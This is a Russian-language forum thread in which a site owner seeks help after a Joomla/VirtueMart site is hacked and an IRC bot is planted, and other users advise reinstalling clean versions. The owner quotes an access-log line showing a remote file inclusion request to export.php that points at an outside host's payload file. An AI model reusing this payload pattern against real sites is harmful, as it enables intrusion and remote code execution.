атака на сайт через VirtueMart - [VM1] Общие вопросы и ошибки

всем привет
есть проблема следующего характера: от хостера приходят уведомления о запуске от моего аккаунта вредоносных программ

версия Joomla - 1.5.8
версия  VirtueMart - 1.1.0

после первого уведомления сайты заблокировали и предложили самостоятельно разобраться с содержимым сайтов... помогать хостер вообще отказался
к сожалению, на тот момент логи обращений не велись. я вообще довольно далек от веб безопасности и банально не очень хорошо представляю себе как все функционирует. поэтому в тот раз не получилось выявить как и откуда была проведена атака

зараженный файлик был выявлен банальным сканом слитого сайта НОДом
был произведен апгрейд Joomla до 1.5.9 и заменены все пароли (БД, админка, ФТП)
но тем не менее, сегодня ситуация повторилась

судя по всему, вот сама атака...
"GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.koeln-ks.de/temp/injek.txt? HTTP/1.0" 403 4188 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5"
79.140.241.1 - - [27/Apr/2009:09:36:23 +0400]

ну и я могу радостно наблюдать у себя на ФТП каталог с Eggdrop (бот для IRC)

ну и теперь самое важное для меня - что же, собственно, нужно сделать?
как мне кажется, нужно обновить виртумарт, но не понятно куда, т.к. у меня и так стоит последняя версия...
лезть в код export.php для поиска чего бы то ни было не могу, т.к. вообще ничего не понимаю в PHP

если кто сможет подсказать что-то полезное по решению проблемы, буду очень благодарен

А нет такого файла в virtuemart. Видимо, это уже использование ранее внедренного файла.

спасибо за ответ!
что-то не догадался проверить наличие такого файла в оригинальном дистрибутиве
попробую переставить все и сообщу о результатах...

кстати посмотрел на локальном компе - есть такой файлик
лежит в \administrator\components\com_virtuemart\

так что вопрос открыт...

Хм))) откуда дистриб качал? ))))
Вывод прост) либо уже скачал с ним, либо подцепил шота... и он дописал куда надо, то что надо)))

Ставь антивирь... потом качай заново дистриб с официального сайта... и переставляй

качал отсюда
точнее - http://joomlaforum.ru/index.php/topic,32770.0.html
спасибо за советы!

все скачаю еще раз
есть только вопрос - можно ли пользоваться старой SQL базой с зараженного сайта?
подозреваю, что вопрос дурацкий и ответ - конечно можно, это вообще не связанные вещи
но лучше еще раз убедиться

ставьте 1.1.3 с virtuemart.net

всем привет еще раз
на чистой машине установил новые версии Joomla и виртумарта (скачанного с virtuemart.net)
файл  export.php ЕСТЬ в директории administrator\components\com_virtuemart

я же не выдумываю
просто сделал одно и то же с одинаковым результатом на 3-х независимых машинах (последняя чистая)
вопрос - его точно не должно быть в оригинальных сборках?
проверил 4 раза

может кто 1 раз проверит тоже?

файл  export.php ЕСТЬ в директории administrator\components\com_virtuemart

В Virtuemart 1.1.3 файл export.php есть.

К вопросу об уязвимости.


Попробуйте связку Joomla 1.5.10 + Virtuemart 1.1.3 - работает без проблем.

большущее спасибо за помощь!
все переустановил
единственное, при попытке экспорта и последующего импорта базы на новый (чистый) сайт возникли проблемы..
походу база была запорота во время взлома...
в результате пришлось убрать эти таблицы из (не в ладах я с терминологией )
ну и все далее прошло нормально

если будут глюки или повторные взломы - сообщу

еще раз спасибо!